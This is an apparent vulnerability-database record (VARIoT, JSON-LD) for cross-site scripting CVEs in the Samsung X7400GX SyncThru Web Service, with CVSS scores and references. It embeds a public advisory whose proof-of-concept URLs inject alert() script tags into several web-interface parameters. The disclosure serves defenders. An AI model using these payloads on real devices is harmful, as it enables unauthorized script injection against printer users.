URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter popupid=alert("XSS");
- Solution:
Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-0462",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "syncthru web service",
"scope": "eq",
"trust": 1.0,
"vendor": "samsung",
"version": null
},
{
"model": "x7400gx",
"scope": "eq",
"trust": 1.0,
"vendor": "samsung",
"version": "6.a6.25"
},
{
"model": "syncthru web service",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
},
{
"model": "x7400gx",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002786"
},
{
"db": "NVD",
"id": "CVE-2019-7419"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:samsung:syncthru_web_service",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:samsung:x7400gx_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002786"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Rafael Pedrero",
"sources": [
{
"db": "PACKETSTORM",
"id": "151584"
}
],
"trust": 0.1
},
"cve": "CVE-2019-7419",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2019-7419",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-158854",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2019-7419",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-7419",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-7419",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201902-579",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-158854",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158854"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002786"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-579"
},
{
"db": "NVD",
"id": "CVE-2019-7419"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. \u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7418\n# Category: webapps\n\n1. Description\n\nXSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25\nV11.01.05.25_08-21-2015 in \"/sws/swsAlert.sws\" in multiple parameters:\nflag, frame, func, and Nfunc. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n frame=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n flag=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\n\nParameter\n Nfunc=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n func=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n type=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n popupid=\u003cSCRIPT\u003ealert(\"XSS\");\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7419\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\n\n\nParameter\n ruiFw_title=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_pid=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_id=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7420\n# Category: webapps\n\n1. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n\nParameter\n tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7421\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\n\nParameter\n contextpath=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026popupid=id_Login\n\n\nParameter\n basedURL=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002786"
},
{
"db": "VULHUB",
"id": "VHN-158854"
},
{
"db": "PACKETSTORM",
"id": "151584"
}
],
"trust": 0.9
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7419",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "151584",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002786",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201902-579",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-158854",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158854"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002786"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-579"
},
{
"db": "NVD",
"id": "CVE-2019-7419"
}
]
},
"id": "VAR-201903-0462",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158854"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:12:08.760000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.samsungprinter.com/"
},
{
"title": "SAMSUNG X7400GX SyncThru Web Service Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=89377"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002786"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-579"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158854"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002786"
},
{
"db": "NVD",
"id": "CVE-2019-7419"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/151584/samsung-x7400gx-sync-thru-web-cross-site-scripting.html"
},
{
"trust": 1.8,
"url": "http://www.samsung.com/support/productsupport/download/index.aspx"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2019/feb/28"
},
{
"trust": 1.7,
"url": "http://www.samsungprinter.com/"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7419"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7419"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7421"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_pid=maintenance\u0026ruifw_title=mantenimiento"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=maintenance\u0026ruifw_title=%3cscript%3ealert(xss);%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7418"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "https://www.owasp.org/index.php/xss_(cross_site_scripting)_prevention_cheat_sheet#xss_prevention_rules"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.login/gnb/loginview.sws?basedurl=%3cscript%3ealert(xss);%3c/script%3e\u0026popupid=id_login"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.login/gnb/loginview.sws?contextpath=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_title=mantenimiento"
},
{
"trust": 0.1,
"url": "http://www.samsungprinter.com/,"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.application/information/networkinformationview.sws?tabname=%3cscript%3ealert(%22xss%22);%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7420"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026flag=\u0026frame=\u0026msg=the%20requested%20report(s)%20will%20be%20printed"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158854"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002786"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-579"
},
{
"db": "NVD",
"id": "CVE-2019-7419"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158854"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002786"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-579"
},
{
"db": "NVD",
"id": "CVE-2019-7419"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-158854"
},
{
"date": "2019-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002786"
},
{
"date": "2019-02-08T02:22:22",
"db": "PACKETSTORM",
"id": "151584"
},
{
"date": "2019-02-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-579"
},
{
"date": "2019-03-21T16:01:12.860000",
"db": "NVD",
"id": "CVE-2019-7419"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-25T00:00:00",
"db": "VULHUB",
"id": "VHN-158854"
},
{
"date": "2019-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002786"
},
{
"date": "2019-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-579"
},
{
"date": "2024-11-21T04:48:11.397000",
"db": "NVD",
"id": "CVE-2019-7419"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-579"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAMSUNG X7400GX SyncThru Web Service Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002786"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-579"
}
],
"trust": 0.7
}
}
var-201903-0464
Vulnerability from variot
SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. <!--
Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
Date: 24-01-2019
Exploit Author: Rafael Pedrero
Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
Tested on: all
CVE : CVE-2019-7418
Category: webapps
- Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc.
- Proof of Concept
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed
Parameter frame=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter flag=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter Nfunc=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter func=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter type=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter popupid=alert("XSS");
- Solution:
Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
